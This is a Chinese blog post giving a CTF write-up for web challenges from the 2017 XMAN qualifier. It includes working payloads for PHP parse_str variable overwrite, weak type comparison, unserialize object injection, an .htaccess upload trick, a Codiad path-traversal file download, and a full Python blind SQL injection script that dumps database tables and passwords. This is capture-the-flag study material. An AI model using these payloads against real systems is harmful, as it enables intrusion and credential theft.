Chybeta

XMAN选拔赛-2017-web-writeup

XMAN选拔赛-2017-web-writeup 都是基础题目

variacover

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<meta charset="utf-8">
<?php
error_reporting(0);
if (empty($_GET['b'])) {
show_source(__FILE__);
die();
}else{
include('flag.php');
$a = "www.XMAN.com";
$b = $_GET['b'];
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
echo $flag;
}else{
exit('你的答案不对0.0');
}
}
?>

parse_str变量覆盖漏洞,和php弱类型比较问题。

1
http://challenges.xctf.org.cn:7771/?b=a[0]=240610708

得到flag:

1
XMAN{A_sTr_covcderd_t3st_you_oW?}

urldecode

改为XMAN后提示urldecode:

考点应该是类似二次注入类型,
将XMAN进行一次urlencode,再把其中的%替换为%25,最后的payload:

1
http://challenges.xctf.org.cn:7772/?me=%2558%254d%2541%254e

得到flag

1
XMAN{UrlDeCode_CooL_yOu_u0D3rSta9D!

upload

比赛时没做这题。
.htaccess。先自己新建一个文件.htaccess,内容如下:

1
2
3
<FilesMatch "_chybeta.gif">
SetHandler application/x-httpd-php
</FilesMatch>

然后现在要上传跟我说已经exist了。好吧GG。比赛结束后没人维护了。

unserialize

访问:

1
http://challenges.xctf.org.cn:7774/?code=1

得到hint: flag.php。访问:

1
http://challenges.xctf.org.cn:7774/flag.php

得到hint2: help.php

1
http://challenges.xctf.org.cn:7774/help.php

得到hint3:

1
class FileClass{ public $filename = 'error.log'; public function __toString(){ return file_get_contents($this->filename); } }

知道是反序列化问题,用下面代码生成:

1
2
3
4
5
6
7
8
9
10
11
<?php
class FileClass{
public $filename = 'error.log';
public function __toString(){
return file_get_contents($this->filename);
}
}
$chybeta = new FileClass();
$chybeta->filename = 'flag.php';
echo serialize($chybeta);

访问:

1
http://challenges.xctf.org.cn:7774/?code=O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}

最后flag

1
XMAN{UUNser1AL1Z3_XMAN__0)(0}

这题源码:
index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
if(empty($_GET['code'])){
exit('?code=');
}
class FileClass{
public $filename = 'error.log';
public function __toString(){
return file_get_contents($this->filename);
}
}
class User{
public $age = 0;
public $name = '';
public function __toString()
{
return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
echo "hint: flag.php";
$obj = unserialize($_GET['code']);
echo $obj;
?>

PHP

扫到index.php~,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
$a=0;
$b=0;
$c=0;
if (isset($_GET['aaa']))
{
$aaa = $_GET['aaa'];
$aaa=="1"?die("Emmm..."):NULL;
switch ($aaa)
{
case 0:
case 1:
$a=1;
break;
}
}
$bbb=(array)json_decode(@$_GET['bbb']);
if(is_array($bbb)){
is_numeric(@$bbb["ccc"])?die("Emmm..."):NULL;
if(@$bbb["ccc"]){
($bbb["ccc"]>2017)?$b=1:NULL;
}
if(is_array(@$bbb["ddd"])){
if(count($bbb["ddd"])!==2 OR !is_array($bbb["ddd"][0])) die("Emmm...");
$eee = array_search("XMAN", $bbb["ddd"]);
$eee===false?die("Emmm..."):NULL;
foreach($bbb["ddd"] as $key=>$val){
$val==="XMAN"?die("Emmm..."):NULL;
}
$c=1;
}
}
if($a && $b && $c){
include "flag.php";
echo $flag;
}
?>

考察php弱类型。payload如下:

1
http://challenges.xctf.org.cn:8004/index.php?aaa=1abcdef&bbb={"ccc":"2018a","ddd":[[1],0]}

得到flag:

1
XMAN{PHP_IS_THE_BEST_LANGUAGE}

downloaded

用admin登陆后发现是Codiad 2.5.3,exploit-db上找到poc

1
https://www.exploit-db.com/exploits/36371/

找flag的位置花了一点时间。最后paylaod:

1
http://challenges.xctf.org.cn:7775/components/filemanager/download.php?path=../../../../../../../../../../../var/www/flag.txt&type=undefined

1
XMAN{D0WnL0D_3v3RYTh1ng_You_Win}

spring

CVE-2017-4971:Spring WebFlow漏洞。到处找poc。

1
XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

参考:https://github.com/Medicean/VulApps/tree/master/s/springwebflow/1

CTF用户登录

在登陆处存在注入,登陆成功与否加载了html标签前,直接用浏览器看是看不到的不会解析。经过fuzz,可以知道过滤了逗号,空格等,但union select,substr,and,or,单引号,#没有过滤。

  • 逗号被过滤,可以用以下方式绕过:

    1
    2
    3
    mid(user() from 1 for 1)
    substr(user() from 1 for 1)
  • 空格被过滤,可以用tab键绕过,其url编码为%09

所以这题就是盲注,下面附上python脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# -*- coding:utf-8 -*-
import requests
import string
import sys
global findBit
def sendPayload(payload):
proxy = {"http":"http://127.0.0.1:8080"}
url = "http://challenges.xctf.org.cn:8003/login.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
parm = "username="+payload+"&password=bb&submit="
content = requests.post(url,data=parm,headers=headers,proxies=proxy)
return content.text
cuowu = '\u9519\u8bef'.decode('unicode_escape')
def generateTarget(flag):
if flag == "database":
return "database()"
elif flag == "tables":
return "(SELECT%09GROUP_CONCAT(table_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.TABLES%09WHERE%09TABLE_SCHEMA=0x786d616e)"
elif flag == "columns":
return "(SELECT%09GROUP_CONCAT(column_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.COLUMNS%09WHERE%09TABLE_NAME=0x6374665f7573657273)"
elif flag == "data":
return "(SELECT%09GROUP_CONCAT(gpass%09SEPARATOR%090x3c62723e)%09FROM%09ctf_users)"
def doubleSearch(leftNum,rightNum,i,target):
global findBit
midNum = (leftNum + rightNum) / 2
if (rightNum != leftNum +1):
payload = "a'%09or%09(%09select%09ascii(substr("+generateTarget(target) +"%09from%09"+ str(i) +"%09for%091))<="+str(midNum) +")%23"
# print payload
recv = sendPayload(payload)
# print recv
if cuowu in recv:
# print 'cuowu'
# raw_input()
doubleSearch(midNum,rightNum,i,target)
else:
# print 'chenggong'
# raw_input()
doubleSearch(leftNum,midNum,i,target)
else:
if rightNum != 0:
# print rightNum
# raw_input()
sys.stdout.write(chr(rightNum))
sys.stdout.flush()
else:
findBit = 1
return
def exp():
global findBit
i = 1
findBit = 0
print "The database:"
target = "database"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
i = 1
findBit = 0
print "The tables:"
target = "tables"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
i = 1
findBit = 0
print "The columns:"
target = "columns"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
i = 1
findBit = 0
print "The data:"
target = "data"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
exp()

最后flag:

1
XMAN{DO_you_l1ke_sqlmap_sqlmap}

倾听世界的声音

XSS,还没开始研究。膜拜大佬。

参考:http://www.cnblogs.com/zaki-Gui/p/7115821.html

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:XMAN选拔赛-2017-web-writeup

文章作者:chybeta

发布时间:2017年07月16日 - 11:07

最后更新:2017年07月28日 - 15:07

原始链接:http://chybeta.github.io/2017/07/16/XMAN选拔赛-2017-web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。